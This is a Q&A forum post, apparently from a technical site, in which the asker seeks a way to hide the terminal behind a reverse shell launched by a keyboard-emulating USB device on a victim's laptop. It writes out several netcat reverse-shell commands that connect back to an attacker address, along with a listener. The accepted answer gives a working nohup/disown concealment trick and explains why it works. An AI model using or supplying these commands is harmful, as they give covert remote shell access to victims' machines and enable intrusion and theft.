# Hide a reverse shell terminal without screen

Tags: linux, bash, shell, reverse-shell

**SCENARIO:** the attacker insert into a victim's laptop an USB which acts as a keyboard. The payload opens a terminal, executes a reverse shell and **hides** the terminal.

**PROBLEM:** the tests I did locally (ubuntu 19.04, and digispark as usb) are the following:

**ONE**

terminal A `nc -e /bin/bash 10.10.10.10 8888`

terminal B `nc -vlp 8888`

Everything works, I have my shell with the prompt on the terminal B but the terminal A is not hidden. Then it is useless in this case.

**TWO**

terminal A `nc -e /bin/bash 10.10.10.10 8888&; disown; exit`

terminal B `nc -vlp 8888`

terminal B just hangs and terminal A is hidden. Useless.

**THREE**

terminal A `nohup nc -e /bin/bash 10.10.10.10 8888&; exit`

terminal B `nc -vlp 8888`

terminal B just hangs and terminal A is hidden

**FOUR**

terminal A: I open `screen` then execute`nc -e /bin/bash 10.10.10.10 8888` , `CTRL^A` , then `d` and finally `exit`.

terminal B `nc -vlp 8888`

using `screen` everything works (terminal B receives a working shell and terminal A isn't visible) but I don't want to use screen because it is not installed by default.

**QUESTION:** is there a way (**using preinstalled tools**) to hidden the terminal without `screen` but with the same effect?

Comment: try `nohup nc ...&; disown; exit`

Comment: It works flawlessly, damn, one of the combination I didn't try XD. Can you explain me why it works? Thanks a lot!!

Answer (score 0, accepted):

```
nohup nc ...&; disown; exit
```

After the shell exits, the terminal will either logout or shutdown (depending on what kind of terminal it is), and send SIGHUP to the controlling process group, which would cause nc to exit.

Using `nohup` detaches from the terminal and runs `nc` in its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.

Comment: afaik you don't need the `;` after the `&` but I'm not sure though.